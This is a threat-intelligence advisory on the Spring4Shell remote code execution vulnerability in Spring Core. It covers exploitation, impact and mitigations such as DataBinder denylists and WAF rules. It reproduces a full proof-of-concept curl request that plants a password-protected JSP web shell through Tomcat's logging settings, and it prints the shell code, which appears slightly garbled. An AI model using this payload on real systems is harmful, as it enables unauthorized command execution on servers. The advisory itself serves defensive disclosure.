| Category: Vulnerability Intelligence | Vulnerability Class: Remote code execution | CVE ID: To be assigned | CVSS:3.0 Score: To be assigned |
Spring4Shell - Executive Summary
- A new critical zero-day vulnerability in the popular Spring framework for Java came into the spotlight when its exploit was first published by a Chinese security researcher “heige” on Twitter (@80vul).
- Later it was confirmed that a bypass released for an older vulnerability, CVE-2010-1622, affects Spring Core on JDK9+ thereby allowing the attacker to perform remote code execution on the vulnerable systems.
- Earlier, a similar attack scenario was observed when Log4j servers were massively exploited in December 2021, to undertake large-scale ransomware attacks.
Analysis
| About Spring FrameworkThe Spring Framework is an open-source application framework that provides infrastructure support for developing Java applications. Spring is the world's most popular lightweight open-source Java framework, that facilitates the Java enterprise application development cycle for developers. Java, Spring Boot, Auth0, Bugsnag, and Java EE are some of the popular tools that integrate with Spring. 544 companies reportedly use Spring in their tech stacks, including Accenture and Zalando. | ExploitationTo successfully exploit the vulnerability, the DataBinder must be enabled. In some cases, all an attacker needs to do is submit a specially crafted HTTP request to a vulnerable system to exploit the vulnerability. Conversely, the exploitation of certain other configurations requires extra research to develop an effective payload. On Successful ExploitationThreat actors can leverage these exploits to run commands on the server, granting them initial access to the device. |
| Mass ScanningThreat actors will be able to devise scripts that crawl the Internet and automatically exploit susceptible servers because the exploitation involves only a simple HTTP POST to a vulnerable app. | |
| Note: The Java Spring Core Zero-Day Vulnerability also dubbed “Spring4Shell” is unrelated from the other vulnerabilities disclosed in the Spring framework this week, including the DoS vulnerability (CVE-2022-22950) and the Spring Cloud expression resource access vulnerability (CVE-2022-22963). |
Information from OSINT
The various posts related to the exploit released for Spring4Shell are listed as follows:
- The leaked PoC by “helloexp” which appeared to allow unauthenticated attackers to execute code on target systems, was later deleted.
Proof of Concept (Exploit)
curl -v -d "class.module.classLoader.resources.context.parent.pipeline .first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(% 22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRunt ime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int% 20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20 while((a%3Din.read(b))3D-1)%7B%20out.println(new%20String(b))%3B%20%7 D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context .parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources .context.parent.pipeline.first.directory=webapps/ROOT&class.module.cl assLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&cl ass.module.classLoader.resources.context.parent.pipeline.first.fileDat eFormat=" http://localhost:8080/springmvc5-helloworld-exmaple-0.0.1- SNAPSHOT/rapid7
This payload drops a password protected web shell in the Tomcat Root Directory called tomcatwar.jsp
- if("j".equals(request.getParameter("pwd"))){ java.io.InputStream in = -.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))3D-1){ out. println(new String(b)); } } -
This Tomcat server specific payload alters the Tomcat server’s logging properties via ClassLoader. The payload simply redirects the logging logic to the ROOT directory and drops the file + payload.
Spring4Shell - Impact: Who and What
Users running JDK version 9 and newer are vulnerable to an RCE attack. Also, all versions of Spring Core are said to be impacted.
At present, there is no official patch from Spring. Hence Threat actors can leverage this vulnerability to perform unauthorized remote code execution. Due to the ease of exploitation, the threat actors may undertake large-scale exploitation activities similar to Log4j. Attackers can exploit the vulnerability to perform malware or ransomware attacks on an organization
Mitigation
In Spring Framework, DataBinder has the functionality to disallow certain patterns. As temporary mitigation for this vulnerability, the ControllerAdvice component can be created (which is a Spring component shared across Controllers) and dangerous patterns can be added to the denylist.
On network protection devices such as WAF, implement rule filtering for strings such as "class.*", "Class.*", "*.class.*", and "*.Class.*" according to the actual traffic situation of deployed services. This is because, "Spring4Shell" leverages class injection (very severe)
Lastly, one should stay updated on the latest release of official patches from Spring and fix vulnerabilities according to these patches.
References
- SpringShell: Spring Core RCE 0-day Vulnerability - Cyber Kendra
- Unpatched Java Spring Framework 0-Day RCE Bug Threatens Enterprise Web Apps Security
- Spring4Shell: Zero-Day Vulnerability in Spring Framework | Rapid7 Blog
- Spring Core on JDK9+ is vulnerable to remote code execution - Praetorian
- https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/